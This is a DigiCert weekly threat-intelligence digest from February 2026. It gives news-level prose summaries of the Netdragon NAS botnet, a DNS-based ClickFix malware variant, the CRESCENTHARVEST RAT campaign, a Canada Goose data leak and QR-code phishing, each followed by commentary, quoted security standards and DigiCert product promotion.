DigiCert’s Open-Source Intelligence (OSINT) Report – February 13 – February 19, 2026

Feiniu NAS Devices Compromised in Massive Netdragon Botnet Attack

(TLP: CLEAR) Feiniu (fnOS) NAS devices have been targeted in a large-scale, deliberate attack campaign by the Netdragon malware family. Identified in October 2024, and still actively growing as of early 2026. Rather than casting a wide net across device types, the attackers specifically tailored their tooling to fnOS. A platform-specific investment that signals this is not opportunistic scanning but, a precise operation with Feiniu devices as the intended prey. Attackers exploit undisclosed vulnerabilities in exposed services to gain initial access, after which they implant a botnet capable of executing DDoS attacks and maintaining persistent remote control over the compromised host. By late January 2026, command-and-control panels showed over 1,143 active bots, with the total infection count approaching roughly 1,500 devices. The geographic spread is broad: China, US, Singapore, and Australia are all represented. The affected sectors include IT services and manufacturing, meaning the collateral risk extends well beyond individual home users into business-critical storage infrastructure. An alarming single development came on February 1, 2026, when operators issued a coordinated command across infected devices to delete the rsa_private_key.pem file. The intent remains unclear, but the deliberate targeting of cryptographic key material raises the serious possibility of a forthcoming ransomware or data encryption phase. This possibly suggests: the botnet operators may be laying groundwork for a second, more destructive stage of the campaign. The malware itself is built with a modular architecture consisting of distinct Loader and DDoS components, each carefully adapted to the fnOS environment in ways that complicate both detection and removal. The Loader component is particularly aggressive in covering its tracks — it wipes logs across multiple system paths, kills competing processes, and dismantles recovery mechanisms so that even a technically capable administrator will struggle to assess the full scope of the compromise. 

(TLP: CLEAR) Comments: The shift toward botnets of compromised consumer and IoT devices is not merely a tactical convenience; it fundamentally changes the threat because the “weapons” in a DDoS attack are indistinguishable from normal network participants right up until the moment they’re weaponized. A laptop, a tablet, and a NAS device are trusted nodes on trusted networks, and that legitimacy is precisely what makes botnet-driven DDoS so difficult to filter at scale. The Netdragon campaign targeting Feiniu NAS devices is a textbook illustration of exactly this dynamic: attackers didn’t build powerful attack servers, they quietly conscribed roughly 1,500 storage devices that sit inside corporate and home networks, behind firewalls, with established network reputations.

(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Distributed denial-of-service (DDoS) is a form attack where the attack traffic is generated from many distributed sources to achieve a high-volume attack and directed towards an intended victim (i.e., system or server). To conduct a direct DDoS attack, the attacker typically makes use of a few powerful computers or a vast number of unsuspecting, compromised third-party devices (e.g., laptops, tablets, cell phones, Internet of Things (IoT) devices, etc.). The latter scenario is often implemented through botnets. In many DDoS attacks, the IP source addresses in the attack messages are “spoofed” to avoid traceability.”

(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.

Source: https://cyberpress.org/netdragon-botnet-targets-feiniu-nas/

Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging 

(TLP: CLEAR) Microsoft revealed a new and notably stealthy variant of the ClickFix social engineering tactic that abuses DNS lookups via the Windows “nslookup” command to retrieve malware payloads, departing from the traditional reliance on web requests that security tools are better equipped to detect and block. Rather than directing victims to a malicious URL, the attack routes through DNS infrastructure — a channel that blends far more naturally into normal network traffic and is less likely to trigger alerts. The initial command is executed through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, bypassing the system’s default resolver entirely. The response is then filtered to extract the “Name:” field, which contains the encoded second-stage payload — effectively turning the DNS protocol into a covert delivery and signaling mechanism that also adds a validation layer before the final malware executes. Once that second stage runs, it downloads a ZIP archive from an external server, extracts a malicious Python script, and kicks off a chain of reconnaissance and discovery commands before dropping a VBScript responsible for launching ModeloRAT. ModeloRAT is a Python-based remote access trojan previously seen in CrashFix campaigns. To ensure the infection survives reboots, a Windows shortcut (LNK) file pointing to the VBScript is planted in the Windows Startup folder, meaning the malware launches automatically every time the system starts. The broader appeal of ClickFix is that it sidesteps traditional security controls entirely by having the victims execute the malicious commands themselves, exploiting trust in the instructions provided. That psychological effectiveness has made ClickFix a thriving template, spawning a growing family of variants for social engineering attacks such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix among them. Each adapted to different lures, platforms, and delivery mechanisms while keeping the core manipulation intact.

(TLP: CLEAR) Comments: The DNS-based ClickFix variant represents a meaningful evolution in social engineering. The detail worth fixating on is the deliberate pivot away from web requests toward DNS as a delivery channel because it signals that threat actors are actively studying which parts of the kill chain are getting flagged and engineering around them. DNS is trusted, ubiquitous, and historically under-inspected, which makes it an ideal covert channel. By using it for payload staging rather than just C2 communication is a clever expansion of that abuse. What makes ClickFix as a family so persistently dangerous isn’t any technical sophistication, it’s the psychological architecture underlying it. By making victims the final executor of the malicious command, attackers effectively launder the infection through human action, neutralizing endpoint controls that would otherwise catch the same behavior if it were automated. The fact that this technique has already branched into at least six named variants in a short period suggests it has crossed a threshold from clever trick to established social engineering. It would be imperative that security teams should be treating ClickFix variants the way they treat phishing: not as isolated incidents to patch around, but as a durable, evolving category of threat that demands persistent user education, DNS traffic monitoring, and scrutiny of anything invoking cmd.exe or nslookup through the Windows Run dialog.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors’ intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.”

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Source: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

New ‘CRESCENTHARVEST’ Malware Abuses Iran Protest Narrative for RAT Deployment

(TLP: CLEAR) A malware campaign dubbed CRESCENTHARVEST has been identified by the Acronis TRU team, targeting Iranian citizens and overseas supporters of the Iranian protests through politically charged social engineering. Attackers distribute a RAR archive containing what appears to be legitimate protest footage and a Farsi-language document purporting to offer protest updates but embedded within the archive are two malicious LNK shortcut files disguised as media content. Once opened, these files trigger a PowerShell script that installs a remote access trojan, establishes persistence tied to network connectivity so the malware survives reboots, and uses DLL sideloading through a trusted Google cleanup executable to evade detection. The malware operates in two stages. The first implant targets Google Chrome, decrypting browser encryption keys to harvest credentials, cookies, and session data from applications including Telegram, before exfiltrating everything to an attacker-controlled C2 server. The second implant functions as a full backdoor with keylogging capability, capturing every keystroke and storing it in a hidden file that is uploaded to the C2 server once it reaches a certain size. Acronis notes that CRESCENTHARVEST is a sharp example of threat actors exploiting geopolitical tensions to advance espionage objectives and recommends that individuals aligned with politically sensitive causes treat all unsolicited files with suspicion, use hardware security keys, and implement strong endpoint security measures.

(TLP: CLEAR) Comments: What makes CRESCENTHARVEST particularly concerning from a spread perspective is that it doesn’t rely on technical exploitation to find its victims. It relies on empathy. By packaging malware inside content that sympathizers of the Iranian protests would actively want to open and share protest footage, images, situation reports. The attackers essentially turned the target community’s own solidarity against them. That is a self-propagating social dynamic that no patch can fix. A supporter receives what looks like a compelling update from the ground, opens it, and potentially forwards the same archive to others in their network who share the same sympathies, each one a new infection point. The use of LNK files disguised as media content exploits a well-known but persistently effective Windows behaviors like hiding file extensions from casual users meaning the barrier to accidental execution is extremely low, especially for non-technical recipients who are emotionally invested in the content they believe they’re viewing. The C2 persistence mechanism is also worth highlighting in the context of spread: by triggering on network connection rather than just system startup, the malware ensures it re-establishes contact every time the victim joins a new network, which is particularly dangerous for activists or diaspora members who frequently move between locations and networks. Taken together, this campaign is a reminder that the most effective malware distribution strategies in 2026 aren’t about exploiting software. They’re about exploiting the specific emotional and political context of a target community with enough precision that the victims become unwitting vectors of their own surveillance.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.

Source: https://cyberpress.org/crescentharvest-exploits-protest-for-rat/

Canada Goose Investigating as Hackers Leak 600K Customer Records

(TLP: CLEAR) ShinyHunters, a prolific data extortion group, has added Canada Goose to its dark web leak site, claiming to have stolen over 600,000 customer records. The 1.67 GB dataset, released in JSON format, contains detailed e-commerce order records including customer names, email addresses, phone numbers, billing and shipping addresses, IP addresses, order histories, partial payment card data, device and browser information, and order values — enough to profile high-value customers for targeted phishing, social engineering, and fraud. Canada Goose is aware of the dataset but has found no evidence of a breach of its own systems, stating the data appears to relate to historical customer transactions and that no unmasked financial data was involved. It remains unknown how many customers will be affected or whether individual notifications will be issued, as Canada Goose says its review of the dataset’s accuracy and scope is still ongoing.

(TLP: CLEAR) Comments: Stating there is “no evidence of a breach of our own systems” is a reasonable and important distinction to make, and one that reflects a genuinely complex reality in modern retail cybersecurity: companies often share customer data with third-party service providers as a necessary part of doing business, and breaches can occur several steps removed from the brand itself. If the third-party payment processor holds up, it would be a reminder that supply chain security remains one of the more difficult challenges for any organization to manage, particularly when vendor relationships involve sensitive customer data.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices, inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations.

Source: https://www.bleepingcomputer.com/news/security/canada-goose-investigating-as-hackers-leak-600k-customer-records/

QR Codes Exploited for Phishing Attacks and Malware Spread on Mobile Devices

(TLP: CLEAR) QR code abuse has become a significant mobile threat vector, with attackers embedding malicious codes in emails, documents, and websites to deliver phishing pages, trigger account takeovers, and distribute malicious applications outside official app stores. Because people routinely scan QR codes for payments, menus, and app downloads, these attacks often bypass enterprise protections by shifting the interaction to less-protected personal smartphones — where email filters and web proxies have limited visibility into QR-encoded content compared to plain URLs. Attackers commonly chain multiple redirects, starting with a benign-looking domain, passing through a URL shortener, and landing on a phishing page impersonating webmail or cloud platforms. The APWG reported more than 1 million phishing attacks in Q1 2025, with QR codes playing a growing role in evading filtering. Financial services are the most heavily impacted industry, accounting for 29% of attacks involving compromised QR code shorteners, with qrs[.]ly alone appearing in over 7% of observed malicious QR URLs. Beyond credential phishing, the article highlights two additional attack vectors. In-app deep links allow QR codes to trigger specific actions inside messaging apps like Telegram, WhatsApp, Signal, and Line — a technique that has been documented being used by state-aligned actors to abuse legitimate app features for long-term interception of sensitive communications targeting military and government personnel. QR codes are also being used to distribute malicious Android APK files directly, by passing app store vetting entirely to deliver spyware, banking trojans, and adware, with these APKs frequently requesting extensive permissions including camera access, location tracking, and account management. The article recommends that organizations combine user education with technical controls including QR-aware URL filtering, mobile sandboxing for deep-link behavior, and strict policies restricting sideloaded applications on corporate devices.

(TLP: CLEAR) Comments: What makes QR code-based attacks particularly difficult to address is that the vulnerability isn’t primarily technical, it’s behavioral. QR codes have been normalized through years of legitimate use in restaurants, retail, banking, and public spaces, and that familiarity has created a near-automatic scan reflex in most users that bypasses the same skepticism they might apply to a suspicious link in an email. The finding that many email filters and web proxies still have limited visibility into QR-encoded content is especially concerning, because it means that organizations investing heavily in email security may have a significant blind spot sitting right alongside their other controls

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a complement to anti-virus and Endpoint Detection and Response (EDR) agents to reduce the total amount of malware infections.

Source: https://gbhackers.com/qr-codes-exploited/